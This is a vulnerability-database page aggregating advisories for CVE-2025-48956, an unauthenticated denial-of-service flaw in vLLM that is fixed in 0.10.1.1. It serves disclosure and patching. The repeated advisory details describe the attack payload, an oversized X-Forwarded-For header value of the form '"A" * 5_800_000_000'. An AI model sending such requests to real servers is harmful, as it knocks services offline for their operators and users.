CVE-2025-48956
published 2025-08-21CVE-2025-48956: vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.10.1.1, a Denial of Service (DoS) vulnerability can be…
PriorityP343high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
EPSS
0.53%
40.6th percentile
vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.10.1.1, a Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user. This vulnerability is fixed in 0.10.1.1.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vllm-project | vllm | — | — |
| vllm | vllm | >= 0.1.0 < 0.10.1.1 | 0.10.1.1 |
| vllm | vllm | >= 0.1.0 < 0.10.1.1 | 0.10.1.1 |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
vllm API endpoints vulnerable to Denial of Service Attacks
osv·2025-08-21
CVE-2025-48956 [HIGH] vllm API endpoints vulnerable to Denial of Service Attacks
vllm API endpoints vulnerable to Denial of Service Attacks
### Summary
A Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user.
### Details
The vulnerability leverages the abuse of HTTP headers. By setting a header such as `X-Forwarded-For` to a very large value like `("A" * 5_800_000_000)`, the server's HTTP parser or application logic may attempt to load the entire request into memory, overwhelming system resources.
### Impact
_What kind of vulnerability is it? Who is impacted?_
Type of vulnerability: Denial of Service (
GHSA
vllm API endpoints vulnerable to Denial of Service Attacks
ghsa·2025-08-21
CVE-2025-48956 [HIGH] CWE-400 vllm API endpoints vulnerable to Denial of Service Attacks
vllm API endpoints vulnerable to Denial of Service Attacks
### Summary
A Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user.
### Details
The vulnerability leverages the abuse of HTTP headers. By setting a header such as `X-Forwarded-For` to a very large value like `("A" * 5_800_000_000)`, the server's HTTP parser or application logic may attempt to load the entire request into memory, overwhelming system resources.
### Impact
_What kind of vulnerability is it? Who is impacted?_
Type of vulnerability: Denial of Service (
Red Hat
vllm: HTTP header size limit not enforced allows Denial of Service from Unauthenticated requests
vendor_redhat·2025-08-26·CVSS 7.5
CVE-2025-48956 [HIGH] CWE-130 vllm: HTTP header size limit not enforced allows Denial of Service from Unauthenticated requests
vllm: HTTP header size limit not enforced allows Denial of Service from Unauthenticated requests
vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.10.1.1, a Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user. This vulnerability is fixed in 0.10.1.1.
A flaw was found in vLLM. A denial of service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large X-Forwarded-For header to an HTTP endpoint. This results in server memory exhaustion,
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2025-08-21
Published